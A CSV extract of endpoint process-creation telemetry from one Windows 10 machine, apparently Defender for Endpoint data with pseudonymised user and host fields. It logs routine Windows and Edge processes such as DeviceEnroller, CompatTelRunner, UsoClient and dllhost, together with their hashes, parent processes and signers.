+17,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:00.065200200+00:00,18384,SenseCncProxy.exe,4200,PortableExecutable,2021-05-12 01:12:26.930234800+00:00,C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe,744776,affeaa20cf87ef4bbdc1529ab7fea66d,617bacf42b34dfb44986b4c855f07a7db54b27b6a5a78101bf4e53945d4e65b6,b19ae47bee16c9e6111db0ce54ee8ab52b32273d,7683949c195624008c868b6a7ab6a45c,8a31fd68d0629b6e486209353210c6e4f815ffb1b38e7ab58438ca0c9637f018,3eb02a132c439e2adf17ee32ddf6208727092c5a,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:11.888696800+00:00,4916,MsSense.exe,"""MsSense.exe""",True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:00.135171500+00:00,2021-06-24 00:55:46.437977500+00:00,8d6a9653-c417-41d7-8849-be6acb77d6ed,computerpii_0a470890c60768167990033d701e7bd881398861,168747,False,10.7740.19041.1052,False,11540474045137006,,11540474045175293,2021-06-10 00:46:11.888696800+00:00,4916,2021-06-10 00:46:11.888696800+00:00,\Device\HarddiskVolume3\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe,4916,128,ActiveProcessStartkey,C:\Program Files\Windows Defender Advanced Threat Protection,5393304,2014-12-21 17:17:53+00:00,2021-06-09 01:20:34.243399200+00:00,2021-06-10 00:46:12.793828700+00:00,2021-06-09 01:20:34.069525500+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.1052,MsSense.exe,MsSense.exe,Windows Defender Advanced Threat Protection Service Executable,Microsoft Corporation,Microsoft® Windows® Operating System,10.7740.19041.964,SenseCncProxy.exe,SenseCncProxy.exe,Windows Defender Advanced Threat Protection Communications module
+18,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:20.518805+00:00,3000,DeviceEnroller.exe,"deviceenroller.exe /o ""280DE7BA-C92E-4BB4-BD1E-28942F50CF93"" /c /b",PortableExecutable,2021-04-14 01:10:22.237455+00:00,C:\Windows\System32\DeviceEnroller.exe,480256,669107f0f0daf359086d6f4349412f7b,06f7b0c17988cae5a622bdcc27667f771a06243fdf0a88f34981947d5d6bf8f9,588d272614a5522df8539ec8f5ef477b6dcf33d9,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:20.559415200+00:00,2021-06-24 00:55:46.438753400+00:00,76a41aa3-25d4-41ae-90e4-c997e63a0ba1,computerpii_0a470890c60768167990033d701e7bd881398861,168768,False,10.7740.19041.1052,False,11540474045136925,,11540474045175300,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,API for MDM Enrollment,deviceenroller.exe,API for MDM Enrollment
+19,False,Medium,S-1-12-1-3476864874-1154527411-4288707492-1560701320,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,TokenElevationTypeLimited,NotWeb,2021-06-24 00:54:21.046917+00:00,1524,msedge.exe,"""msedge.exe"" --type=gpu-process --field-trial-handle=2084,2987170515631334499,3695594818534080064,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=32902 --gpu-device-id=39745 --gpu-sub-system-id=161484840 --gpu-revision=2 --gpu-driver-version=27.20.100.8336 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6696 /prefetch:2",PortableExecutable,2021-05-21 00:32:35.112476600+00:00,C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,3278224,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,e28229223228fde1f3bb465926566414,a1cb5c84d7387fa4da415c9af0db5f5534575f045f71b7afee0922fc0352d73f,c0c6f4240a04db99aae6f7c5312b7308c44945b1,S-1-12-1-3476864874-1154527411-4288707492-1560701320,DomainPII_6c8dcea42fcdd51d2421333a881b2b98b372fa53,UserPII_cb487ecb6ebb69c2e3f5369461ae31b54a1cdc01,2021-06-24 00:52:20.669190100+00:00,15088,msedge.exe,"""msedge.exe"" --profile-directory=Default",False,2021-06-24 00:52:13.094577200+00:00,18420,\Device\HarddiskVolume3\Windows\explorer.exe,Medium,TokenElevationTypeLimited,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:21.085916600+00:00,2021-06-24 00:55:46.438951600+00:00,a5957d95-694c-44bb-b6ed-c0154f7f6094,computerpii_0a470890c60768167990033d701e7bd881398861,168773,False,10.7740.19041.1052,False,11540474045175158,,11540474045175304,2021-06-24 00:52:20.669190100+00:00,15088,2021-06-24 00:52:20.669190100+00:00,\Device\HarddiskVolume3\Program Files (x86)\Microsoft\Edge\Application\msedge.exe,15088,128,ActiveProcessStartkey,C:\Program Files (x86)\Microsoft\Edge\Application,3278224,2021-06-17 16:58:31+00:00,2021-06-18 05:12:00.071479900+00:00,2021-06-23 01:16:40.091697100+00:00,2021-05-21 00:32:35.112476600+00:00,128,NoTruncation,0,,10.0,False,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,UserPII_76001d79ce118707bd804819d6a5e2475a9e7063@DomainPII_5905447fef94e7b91092246774418820da1785bd.com,cf3cbf6a-b0b3-44d0-a47b-a0ff8869065d,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,433423938,433423938,False,1.0,3073.0,1.0,1.0,,,,,,,Valid,OsVendorApplication,Valid,OsVendorApplication,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge,Microsoft Corporation,Microsoft Edge,91.0.864.54,msedge_exe,msedge.exe,Microsoft Edge
+20,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:21.250343700+00:00,15740,DeviceCensus.exe,devicecensus.exe SystemCxt,PortableExecutable,2021-04-14 01:10:18.913311800+00:00,C:\Windows\System32\DeviceCensus.exe,57672,e4e45a9e9e546c9553820b2d876a3ba3,787babc5276737f5f0d1063300883d3381c57a344cc787deb16badaab6d04dd7,9914f5914c02add1d3590844a628b3c5a5fa2c48,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:21.274885600+00:00,2021-06-24 00:55:46.439127100+00:00,5665ac53-4b48-4913-99d0-e239bee4714f,computerpii_0a470890c60768167990033d701e7bd881398861,168778,False,10.7740.19041.1052,False,11540474045136925,,11540474045175308,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,DeviceCensus,DeviceCensus.exe,Device Census
+21,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:21.251190300+00:00,5292,wsqmcons.exe,wsqmcons.exe,PortableExecutable,2020-10-09 20:47:30.168054300+00:00,C:\Windows\System32\wsqmcons.exe,114688,78ebe5d865e3618f6275efc7a54963c9,b78663af2c7177cbb51a1cb62219d8737acc5bd76a0d9c037c949406ff5768cb,6e01cce73376dc359e0bb1f20f36e1e3df3d1793,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:21.276428200+00:00,2021-06-24 00:55:46.439173200+00:00,5c901a93-9351-4ccc-bb52-bae7e7627246,computerpii_0a470890c60768167990033d701e7bd881398861,168779,False,10.7740.19041.1052,False,11540474045136925,,11540474045175309,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,16512,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.572,wsqmcons.exe,wsqmcons.exe,Windows SQM Consolidator
+22,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:21.251515600+00:00,17012,UsoClient.exe,usoclient.exe StartScan,PortableExecutable,2021-04-14 01:10:15.165138700+00:00,C:\Windows\System32\UsoClient.exe,89600,cb83db7acb08ccd0370200eed9a1803b,278567a8a88fb508453c6e415eba46e1d23a419fc2d09992df95883c9f37cebb,76996171bfcbdfad71405cf376b1cd045a2fbb2e,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:21.277609800+00:00,2021-06-24 00:55:46.439210200+00:00,2b772464-4ce6-46d7-9771-6852c6125307,computerpii_0a470890c60768167990033d701e7bd881398861,168780,False,10.7740.19041.1052,False,11540474045136925,,11540474045175310,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.906,UsoClient,UsoClient,UsoClient
+23,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:21.254919700+00:00,8888,rundll32.exe,"rundll32.exe C:\Windows\system32\PcaSvc.dll,PcaPatchSdbTask",PortableExecutable,2021-02-17 04:35:14.391957+00:00,C:\Windows\System32\rundll32.exe,71680,ef3179d498793bf4234f708d3be28633,b53f3c0cd32d7f20849850768da6431e5f876b7bfa61db0aa0700b02873393fa,dd399ae46303343f9f0da189aee11c67bd868222,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:21.280694800+00:00,2021-06-24 00:55:46.439331300+00:00,686c0843-fbea-4ef2-b787-e18c875f93d0,computerpii_0a470890c60768167990033d701e7bd881398861,168783,False,10.7740.19041.1052,False,11540474045136925,,11540474045175312,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.746,rundll,RUNDLL32.EXE,Windows host process (Rundll32)
+24,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:21.257173600+00:00,14188,CompatTelRunner.exe,compattelrunner.exe,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:21.284849700+00:00,2021-06-24 00:55:46.439366200+00:00,848e8731-2123-4aeb-83cc-5cbd30d86062,computerpii_0a470890c60768167990033d701e7bd881398861,168784,False,10.7740.19041.1052,False,11540474045136925,,11540474045175314,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+25,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:21.282711600+00:00,5952,omadmprc.exe,"""omadmprc.exe""",PortableExecutable,2021-03-11 01:06:57.521114400+00:00,C:\Windows\System32\omadmprc.exe,89600,f06daf80820426df0fe3a74fd83eb8c4,0ce7f5311ca53e361a0c8a9def0fccecadea41bee0b684bfe662ed9dd93afcd8,fcb0da2da02f514c5fd6de1ede8a88a48e68fdda,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:54:21.147568900+00:00,16436,svchost.exe,svchost.exe -k netsvcs -p -s dmwappushservice,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:21.305255800+00:00,2021-06-24 00:55:46.439407500+00:00,a4785d30-d4f1-4a4f-9370-a0c909ffaad1,computerpii_0a470890c60768167990033d701e7bd881398861,168785,False,10.7740.19041.1052,False,11540474045175305,,11540474045175315,2021-06-24 00:54:21.147568900+00:00,16436,2021-06-24 00:54:21.147568900+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,16436,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-18 00:35:29.821925200+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.844,omadmprc,omadmprc.exe,Host Process for Push Router Client of OMA-DM
+26,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:21.296592800+00:00,19344,conhost.exe,conhost.exe 0xffffffff -ForceV1,PortableExecutable,2021-05-12 01:12:35.470188200+00:00,C:\Windows\System32\conhost.exe,875008,81ca40085fc75babd2c91d18aa9ffa68,6651ab6c5c6d85c86b0c6c532115662e09f338fa8cc1233e1434139346f25ef6,c313e591b29d8be1cbe3809826a6a8647314698e,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:54:21.257173600+00:00,14188,CompatTelRunner.exe,compattelrunner.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:21.336766500+00:00,2021-06-24 00:55:46.439451300+00:00,a3a59d9a-1990-4039-87f7-2afafe312a88,computerpii_0a470890c60768167990033d701e7bd881398861,168786,False,10.7740.19041.1052,False,11540474045175314,,11540474045175316,2021-06-24 00:54:21.257173600+00:00,14188,2021-06-24 00:54:21.257173600+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,14188,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-24 00:54:21.245734700+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.964,ConHost,CONHOST.EXE,Console Window Host
+27,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:21.316401600+00:00,4580,omadmclient.exe,"omadmclient.exe /serverid ""280DE7BA-C92E-4BB4-BD1E-28942F50CF93"" /lookuptype 1 /initiator 0",PortableExecutable,2021-06-09 01:20:50.418603800+00:00,C:\Windows\System32\omadmclient.exe,436736,06291a6c019c8df6a2cdcd9bcf69e99f,e424757d661bb89804b7147fa5e4b60ec21816aed8dedba1b291c6d41bc190b4,092720f8052fbd0fd20d37fa3f16871493d13777,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.833163100+00:00,1768,svchost.exe,svchost.exe -k netsvcs -p -s Schedule,True,2021-06-10 00:46:10.554990700+00:00,988,services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:21.343796+00:00,2021-06-24 00:55:46.439490700+00:00,59eed401-20ef-41e2-acb0-89734f821757,computerpii_0a470890c60768167990033d701e7bd881398861,168787,False,10.7740.19041.1052,False,11540474045136925,,11540474045175317,2021-06-10 00:46:10.833163100+00:00,1768,2021-06-10 00:46:10.833163100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,1768,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,256,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.1023,omadmclient,omadmclient.exe,Host Process for OMA-DM Client
+28,True,System,S-1-5-18,SYSTEM,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:21.441083700+00:00,15568,CompatTelRunner.exe,CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun -cv:gbdKcilcyUCvVzfm.1,PortableExecutable,2021-04-14 01:10:17.849732200+00:00,C:\Windows\System32\CompatTelRunner.exe,160072,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,68ba4d63ea7cc43189ead2eb67c7756b,2bf5d8e400fe776b3a9f5400ba212ad8d638cc44e7f906e7800be5054445eecc,b4108c1d6832f0d036eedcd3d2f684d43be04996,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-24 00:54:21.257173600+00:00,14188,CompatTelRunner.exe,compattelrunner.exe,True,2021-06-10 00:46:10.833163100+00:00,1768,\Device\HarddiskVolume3\Windows\System32\svchost.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:21.518852100+00:00,2021-06-24 00:55:46.439694200+00:00,352a153c-df2a-4979-96d2-87793ddb7451,computerpii_0a470890c60768167990033d701e7bd881398861,168793,False,10.7740.19041.1052,False,11540474045175314,,11540474045175318,2021-06-24 00:54:21.257173600+00:00,14188,2021-06-24 00:54:21.257173600+00:00,\Device\HarddiskVolume3\Windows\System32\CompatTelRunner.exe,14188,128,ActiveProcessStartkey,C:\Windows\System32,160072,2038-11-30 03:05:59+00:00,2021-04-14 01:10:17.855025900+00:00,2021-06-24 00:54:21.245734700+00:00,2021-04-14 01:10:17.849732200+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,999,False,,128.0,,0.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19645.1029,CompatTelRunner.exe,CompatTelRunner.exe,Microsoft Compatibility Telemetry
+29,True,System,S-1-5-20,NETWORK SERVICE,NT AUTHORITY,TokenElevationTypeDefault,NotWeb,2021-06-24 00:54:22.765270800+00:00,9664,dllhost.exe,DllHost.exe /Processid:{AA65DD7C-83AC-48C0-A6FD-9B61FEBF8800},PortableExecutable,2020-10-09 20:47:24.152425900+00:00,C:\Windows\System32\dllhost.exe,21312,08eb78e5be019df044c26b14703bd1fa,e7fc40b41aa8b83841a0b96d169eaf0800aa784733e636935374d56536253f10,2ce12a317bebf8293f3544433a55d972a5967996,f586835082f632dc8d9404d83bc16316,643ec58e82e0272c97c2a59f6020970d881af19c0ad5029db9c958c13b6558c7,010db07461e45b41c886192df6fd425ba8d42d82,S-1-5-18,NT AUTHORITY,SYSTEM,2021-06-10 00:46:10.653932100+00:00,504,svchost.exe,svchost.exe -k DcomLaunch -p,True,2021-06-10 00:46:10.554990700+00:00,988,\Device\HarddiskVolume3\Windows\System32\services.exe,System,TokenElevationTypeDefault,59860b94-e2f9-40e0-bbe3-4caaeca1df70,b11a7e51e2f2815d1736d0a5826e0b88f609ee8b,,,2021-06-24 00:54:22.904354200+00:00,2021-06-24 00:55:46.440706300+00:00,7353ba5f-d08e-4d1a-932f-321547d28657,computerpii_0a470890c60768167990033d701e7bd881398861,168821,False,10.7740.19041.1052,False,11540474045136908,,11540474045175322,2021-06-10 00:46:10.653932100+00:00,504,2021-06-10 00:46:10.653932100+00:00,\Device\HarddiskVolume3\Windows\System32\svchost.exe,504,128,ActiveProcessStartkey,C:\Windows\System32,57360,1972-12-14 16:22:50+00:00,2020-10-09 20:47:23.714846100+00:00,2021-06-10 00:46:17.892199900+00:00,2020-10-09 20:47:23.714846100+00:00,128,NoTruncation,0,,10.0,False,,,,,True,StrPII_0f28d3f32a893c06f6cf2f5cc375c1420f8d3441,999,996,False,,128.0,,128.0,,,,,,,Valid,OsVendor,Valid,OsVendor,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,svchost.exe,svchost.exe,Host Process for Windows Services,Microsoft Corporation,Microsoft® Windows® Operating System,10.0.19041.546,dllhost.exe,dllhost.exe,COM Surrogate
